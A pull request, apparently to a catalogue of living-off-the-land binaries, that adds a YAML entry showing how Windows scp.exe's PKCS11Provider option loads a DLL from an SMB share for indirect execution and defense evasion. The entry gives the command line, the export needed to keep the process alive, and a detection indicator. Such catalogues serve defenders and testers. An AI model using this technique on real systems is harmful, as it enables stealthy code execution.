### PR TITLE
Add PKCS11Provider option for remote DLL loading in scp.yml

### DIFF
--- a/yml/OSBinaries/Scp.yml
+++ b/yml/OSBinaries/Scp.yml
@@ -31,14 +31,14 @@ Commands:
     OperatingSystem: Windows 10, Windows 11
     Tags:
       - Execute: DLL
-      - Execute: Remote    
+      - Execute: Remote
 Full_Path:
   - Path: C:\Windows\System32\OpenSSH\scp.exe
 Detection:
   - IOC: "`scp.exe` executions referencing `ProxyCommand`."
 Resources:
   - Link: https://gtfobins.org/gtfobins/scp/
-  - Link: https://gist.github.com/screetsec/97d90750bfb058eb0b49c5374cdc0ac9  
+  - Link: https://gist.github.com/screetsec/97d90750bfb058eb0b49c5374cdc0ac9
 Acknowledgement:
   - Person: BinFault
     Handle: '@binfault'

--- a/yml/OSBinaries/Scp.yml
+++ b/yml/OSBinaries/Scp.yml
@@ -22,14 +22,27 @@ Commands:
     OperatingSystem: Windows 10, Windows 11
     Tags:
       - Execute: CMD
+  - Command: scp -o PKCS11Provider="\\127.0.0.1\Temp\Example.dll" . wind@github.com:.
+    Description: Executes a DLL from an SMB share by abusing the PKCS11Provider option. The payload executes upon DLL load (DllMain) and requires exporting C_GetFunctionList to prevent premature termination by `scp.exe`.
+    Usecase: Performs indirect execution of a specified DLL from a remote share, can be used for defense evasion.
+    Category: Execute
+    Privileges: User
+    MitreID: T1202
+    OperatingSystem: Windows 10, Windows 11
+    Tags:
+      - Execute: DLL
+      - Execute: Remote    
 Full_Path:
   - Path: C:\Windows\System32\OpenSSH\scp.exe
 Detection:
   - IOC: "`scp.exe` executions referencing `ProxyCommand`."
 Resources:
   - Link: https://gtfobins.org/gtfobins/scp/
+  - Link: https://gist.github.com/screetsec/97d90750bfb058eb0b49c5374cdc0ac9  
 Acknowledgement:
   - Person: BinFault
     Handle: '@binfault'
   - Person: 'Nir Chako (Pentera)'
     Handle: '@C_h4ck_0'
+  - Person: Edo Maland
+    Handle: '@screetsec'

--- a/yml/OSBinaries/Scp.yml
+++ b/yml/OSBinaries/Scp.yml
@@ -22,12 +22,12 @@ Commands:
     OperatingSystem: Windows 10, Windows 11
     Tags:
       - Execute: CMD
-  - Command: scp -o PKCS11Provider="\\127.0.0.1\Temp\Example.dll" . wind@github.com:.
-    Description: Executes a DLL from an SMB share by abusing the PKCS11Provider option. The payload executes upon DLL load (DllMain) and requires exporting C_GetFunctionList to prevent premature termination by `scp.exe`.
+  - Command: scp -o PKCS11Provider="{PATH_SMB:.dll}" . win@github.com:.
+    Description: Loads a DLL from an absolute path or SMB path into child process `ssh.exe` by abusing the `PKCS11Provider` option. The payload executes upon DLL load (`DllMain`) and requires exporting `C_GetFunctionList` to prevent premature termination by `scp.exe`.
     Usecase: Performs indirect execution of a specified DLL from a remote share, can be used for defense evasion.
     Category: Execute
     Privileges: User
-    MitreID: T1202
+    MitreID: T1218
     OperatingSystem: Windows 10, Windows 11
     Tags:
       - Execute: DLL


### PR DESCRIPTION
`scp` is also affected by the changes introduced in the original PR (#515), as it supports the PKCS11Provider option for remote DLL loading.